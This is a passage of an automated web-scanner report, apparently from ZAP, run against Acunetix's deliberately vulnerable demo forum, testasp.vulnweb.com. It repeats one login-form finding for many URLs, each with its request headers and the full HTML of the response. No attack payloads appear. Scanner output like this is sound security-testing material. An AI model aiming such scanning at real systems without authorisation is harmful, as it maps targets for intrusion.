<td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=41 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=42 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=43 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=44 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
